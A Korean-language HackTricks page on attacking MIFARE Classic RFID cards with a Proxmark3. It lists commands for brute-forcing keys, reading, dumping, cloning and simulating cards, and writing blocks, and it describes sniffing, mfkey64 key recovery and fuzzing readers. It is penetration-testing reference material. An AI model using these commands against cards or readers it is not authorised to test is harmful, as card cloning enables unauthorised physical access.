Proxmark 3

htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요!

Try Hard Security Group


Proxmark3을 사용한 RFID 시스템 공격

첫 번째로 해야 할 일은 Proxmark3을 준비하고 소프트웨어를 설치하고 그 의존성을 해결해야 합니다.

MIFARE Classic 1KB 공격

각각에 4개의 블록이 있는 16개의 섹터가 있습니다. 각 블록은 16B를 포함합니다. UID는 섹터 0 블록 0에 있으며 변경할 수 없습니다. 각 섹터에 액세스하려면 2개의 키(AB)가 필요하며 이는 각 섹터의 블록 3에 저장됩니다(섹터 트레일러). 섹터 트레일러에는 또한 2개의 키를 사용하여 각 블록에 대한 읽기 및 쓰기 권한을 부여하는 액세스 비트가 저장됩니다. 첫 번째 키를 알고 있다면 읽기 권한을 부여하고 두 번째 키를 알고 있다면 쓰기 권한을 부여하는 데 2개의 키가 유용합니다(예:).

여러 공격을 수행할 수 있습니다.

proxmark3> hf mf #List attacks

proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF

proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key

proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory

proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card

Proxmark3는 도청과 같은 다른 작업을 수행할 수 있도록 합니다. 태그와 리더 간 통신을 도청하여 민감한 데이터를 찾아보려고 합니다. 이 카드에서는 암호화 작업이 약하게 사용되어 평문과 암호문을 알고 있다면 키를 계산할 수 있습니다 (mfkey64 도구).

원시 명령어

IoT 시스템은 때로는 브랜드가 없거나 상업적이지 않은 태그를 사용합니다. 이 경우 Proxmark3를 사용하여 태그에 사용자 정의 원시 명령어를 보낼 수 있습니다.

proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search

이 정보를 사용하여 카드에 대한 정보 및 통신 방법을 검색해 볼 수 있습니다. Proxmark3를 사용하면 hf 14a raw -p -b 7 26와 같은 원시 명령을 보낼 수 있습니다.

스크립트

Proxmark3 소프트웨어에는 간단한 작업을 수행하는 데 사용할 수 있는 자동화 스크립트 목록이 미리로드되어 있습니다. 전체 목록을 검색하려면 script list 명령을 사용하십시오. 그런 다음 스크립트 이름 뒤에 script run 명령을 사용하십시오.

proxmark3> script run mfkeys

유효한 카드의 데이터를 복사하여 태그 판독기퍼징하는 스크립트를 만들 수 있습니다. 그냥 Lua 스크립트를 작성하여 하나 이상의 랜덤 바이트랜덤화하고 리더가 반복 중에 충돌하는지 확인하십시오.

Try Hard Security Group

htARTE (HackTricks AWS Red Team Expert)를 통해 **제로부터 영웅까지 AWS 해킹을 배우세요**!

Last updated